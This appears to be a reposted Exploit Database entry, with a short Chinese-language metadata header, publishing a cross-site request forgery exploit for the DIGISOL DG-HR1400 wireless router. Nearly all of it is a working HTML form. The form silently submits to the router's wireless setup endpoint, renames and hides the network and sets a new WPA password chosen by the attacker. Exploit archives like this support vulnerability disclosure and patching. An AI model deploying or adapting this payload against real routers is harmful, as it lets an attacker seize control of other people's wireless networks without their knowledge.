DIGISOL DG-HR1400 Wireless Router – Cross-Site Request Forgery

• Exploit Database
• 39 阅读

• 作者： Indrajith.A.N
  日期： 2017-02-21
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/41404/

• <html>
   Digisol Router CSRF Exploit - Indrajith A.N
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST">
  <input type="hidden" name="mode" value="0" />
  <input type="hidden" name="apssid" value="hacked" />
  <input type="hidden" name="startScanUplinkAp" value="0" />
  <input type="hidden" name="domain" value="1" />
  <input type="hidden" name="hiddenSSID" value="on" />
  <input type="hidden" name="ssid" value="hacked" />
  <input type="hidden" name="band" value="10" />
  <input type="hidden" name="chan" value="6" />
  <input type="hidden" name="chanwid" value="1" />
  <input type="hidden" name="txRate" value="0" />
  <input type="hidden" name="method&#95;cur" value="6" />
  <input type="hidden" name="method" value="6" />
  <input type="hidden" name="authType" value="2" />
  <input type="hidden" name="length" value="1" />
  <input type="hidden" name="format" value="2" />
  <input type="hidden" name="defaultTxKeyId" value="1" />
  <input type="hidden" name="key1" value="0000000000" />
  <input type="hidden" name="pskFormat" value="0" />
  <input type="hidden" name="pskValue" value="csrf1234" />
  <input type="hidden" name="checkWPS2" value="1" />
  <input type="hidden" name="save" value="Apply" />
  <input type="hidden" name="basicrates" value="15" />
  <input type="hidden" name="operrates" value="4095" />
  <input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>